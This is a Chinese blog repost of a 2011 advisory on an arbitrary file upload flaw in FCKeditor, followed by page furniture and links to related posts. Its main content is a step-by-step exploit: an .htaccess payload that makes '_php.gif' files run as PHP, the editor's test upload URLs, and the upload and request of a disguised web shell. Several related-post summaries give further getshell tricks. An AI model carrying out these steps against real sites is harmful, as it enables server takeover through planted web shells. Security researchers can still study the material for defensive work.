FCKeditor所有版本任意文件上传缺陷

最新推荐文章于 2023-05-17 21:07:24 发布

转载最新推荐文章于 2023-05-17 21:07:24 发布 · 219 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/mujj/articles/2165996.html

文章标签：

#php #shell

本文介绍了一个存在于FCKeditor所有版本中的任意文件上传漏洞。攻击者可通过特定步骤上传恶意文件并执行代码。该漏洞涉及.htaccess配置及图片文件伪装。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author : pentesters.ir
[+] Website : WwW.PenTesters.IR

利用步骤:

1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.使用编辑器上传htaccess文件.

http://www.xxx.com/FCKeditor/editor/filemanager/upload/test.html

http://www.xxx.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif

4.上传后shell.php.gif, 会自动被改名为 shell_php.gif

5.访问http://www.xxx.com/上传目录/shell_php.gif

转载于:https://www.cnblogs.com/mujj/articles/2165996.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30416871

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

复现awvs——FCKeditor 任意文件上传漏洞思维引导到getshell

记录并分享学习安全的知识点..

03-20

6720

警告请勿使用本文提到的内容违反法律。本文不提供任何担保。一、复习文件解析漏洞解析漏洞,是指中间件(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。（一）Apache解析漏洞 Apache解析文件规则是从右到左。例如shel.php.gix.ccc，apache会先识别ccc，ccc不被识别，则识别gix，以此类推，最后会被识别为php来运行。文件解析漏洞总结-Apache_1stPeak的博客-优快云...

fckeditor任意文件上传漏洞

u012684933的专栏

02-26

6397

1. 创建.htaccess文件，内容如下： <FilesMatch "_php.gif"> SetHandler application/x-httpd-php .htaccess文件可以用来设置某个目录和某个目录的子目录的权限，以上内容的意思是将扩展名是"_php.gif"的文件解析成php 2.使用如下url，上

参与评论您还未登录，请先登录后发表或查看评论

FCKeditor上传设置

MascotDai的专栏

10-30

1173

看大家要FCKeditor上传设置的部分，所以仔细找了下，以前看到别人说FCKeditor有上传漏洞，所以一直没有用过此功能！希望能够解决大家的问题！因版本更新问题，可能具体行数不一致，请大家仔细修改！谢谢大家的关注！FCKeditor目前已经更新到2.4.2版，详情请看官方http://www.fckeditor.net/上传文件设置简洁fckconfig.js 134 135 行[

fckeditor 漏洞php,FCKeditor connector.php任意文件上传漏洞

weixin_36358109的博客

03-11

644

BUGTRAQ ID: 31812CVE(CAN) ID: CVE-2008-6178FCKeditor是一款开放源码的HTML文本编辑器。FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在文件上传限制漏洞：147. function FileUpload( $resourceType...

fckeditor - (4)文件上传

sktoo的专栏

10-03

205

fckeditor默认不支持文件上传，需要下载web服务器端程序（fckeditor.java），并进行配置 1.在web.xml中加入ConnectorServlet的配置信息 <servlet> <servlet-name>Connector</servlet-name> <servlet-class> net.fckeditor...

30.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御（三）1

08-03

文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御（三）1 本文是作者的网络安全自学教程系列的一部分，主要关注的是如何理解和防范网络安全中的某些常见漏洞。作者强调反对利用这些知识进行非法活动，鼓励读者以保护...

FCKeditor漏洞

05-28

在FCKeditor的某些版本中，如2.2至2.4.2，存在一个允许上传任意文件类型的漏洞。这是因为在处理上传请求时，程序未能正确验证`Type`参数的值，导致攻击者可以上传任意格式的文件，包括但不限于脚本文件。虽然默认...

[红日安全]Web安全Day5 - 任意文件上传实战攻防

hongrisec的博客

02-26

1405

本文由红日安全成员： MisakiKata 编写，如有不当，还望斧正。大家好，我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享，还包含一个HTB靶场供大家练习，我们给这个项目起了一个名字叫 Web安全实战，希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法（手工测试，工具测试）-靶场测试（分为PHP靶场、JAVA靶场、P...

文件上传漏洞和修复方案

热门推荐

pygain的博客

10-22

2万+

现代互联网的web应用程序中，文件上传是一种常见的要求，因为它有助于一高业务效率。在大型社交网络程序中都支持文件上传功能。在博客，论坛，电子银行网络，会给用户和企业员工有效的共享文件。允许上传图片，视频，头像和许多其他类型文件。

常用网页编辑器漏洞手册（全面版）fckeditor,ewebeditor

10-28

此外，FCKeditor的PHP版本在2.2至2.4.2之间的某些版本存在一个上传任意文件的漏洞，攻击者可以通过定义Type参数的无效值来绕过上传验证，只要在config.php中启用了文件上传功能，攻击就有可能成功。 EWebEditor的...

FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1

08-03

Exploiting PHP Upload Module ofBypassing File-type CheckExploiting PHP Upload Mo

fckeditor完整版本下载

09-26

fckeditor完整版本下载绝对真实没有虚假大家放心下吧

FCKEDITOR 常用上传方法

10-30

FCKEDITOR 常用上传方法及上传位置

fckeditor 2 6 4 任意文件上传漏洞

ytfhjhv的博客

11-12

6547

fckeditor 2 6 4 任意文件上传漏洞

java fckeditor 文件上传

千里走单骑

09-07

1084

fckeditor-java 案例 by xuchengdongxcd@126.com 1.文件上传绝对路径配置修改fckeditor.properties connector.impl = net.fckeditor.connector.impl.LocalConnector connector.userActionImpl=net.fckeditor.requestcycl

fckeditor上传文件设置

03-19

1856

fckeditor版本：2.5fckeditor是一个开源的在线编辑器，具有功能强大、简单易用的特点。官方的网站为： www.fckeditor.net 下面来介绍一下设置fckeditor支持文件上传：1 修改文件：fckeditor/editor/filemanager/connectors/php/config.php 第30行，修改： $Config[Enabled

单独使用fckeditor的文件上传功能

vkqiang的专栏

03-26

1964

fckeditor的文件上传功能做的确实不错，但只能在编辑器中使用，有点不爽，今天做了一些修改，完成了对它的单独使用。我用的是fckeditor2.6.4版本1.在web.xml中增加如下内容 FckConnector net.fckeditor.connector.ConnectorServlet 1 FckConnector /fckeditor/ed

fckeditor文件上传getshell

千寻的博客

05-17

3759

第二次上传之后是111(1).asp(此时发现已经存在，进行重命名，进行截断)4、更改后缀.asp txt文件，使用hex更改20–00。window server 2019 的IIS搭建的网站。第一次上传之后是111.asp_txt（此时.变成了_）2、发现可以上传一个txt后缀的文件。3、但是无法上传asp的文件。发现存在FCKeditor。1、访问编辑器，进行上传。

FCKeditor文件上传配置

Java_han的专栏

08-30

2950

FCKeditor编辑功能的使用下载并解压FCKeditor放于WebRoot目录下在使用页面引入fckeditor目录下的fckeditor.js <script type="text/javascript" src="./fckeditor/fckeditor.js"></script> 使用如下代码调用显示 <script type="te

FCKeditor.Net 2.6.4版本：文件上传与管理增强

- FredCK.FCKeditorV2.vs2003.csproj、FredCK.FCKeditorV2.vs2005.csproj：这些是特定于不同Visual Studio版本的项目文件，它们用于支持在Visual Studio 2003和2005环境下编译和部署FCKeditor.Net组件。 - _whatsnew...